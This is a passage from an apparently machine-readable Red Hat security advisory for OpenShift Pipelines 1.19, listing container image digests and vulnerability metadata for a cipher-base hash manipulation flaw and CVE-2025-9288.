"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cipher-base: Cipher-base hash manipulation"
},
{
"cve": "CVE-2025-9288",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2025-08-20T23:00:56.263191+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
